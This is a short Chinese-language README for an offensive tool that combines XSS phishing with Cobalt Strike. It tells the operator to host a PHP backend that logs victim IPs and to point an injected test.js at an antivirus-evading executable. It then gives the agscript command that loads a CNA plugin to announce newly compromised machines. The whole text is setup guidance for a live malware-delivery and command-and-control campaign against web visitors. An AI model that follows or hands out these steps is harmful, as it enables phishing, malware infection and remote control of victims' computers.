xss钓鱼，cna插件配合php后端收杆

希望这个解决方案够用

加入了set-cookie判断，修改了获取外网ip逻辑

搭建bobo.php, 路径为http://www.xxx.com/bobo.php

把test.js里的路径修改为真实路径

在php根目录新建botIPs.txt文件用于存储已上线ip

test.js可远程加载也可本地加载，修改xss内容即可

修改test.js里的下载地址为免杀exe的地址

使用cobalt strike 的agscript加载cna插件

./agscript [ip] [port] [username] [password] sendip.cna

等待上线即可

此项目借鉴如下:

[鸭王师傅]: https://github.com/TheKingOfDuck/XSS-Fishing2-CS

[xq17师傅]: https://xz.aliyun.com/t/7958

1. 在出口一致的情况下加入多个判断依据

2. 对x64与x86区分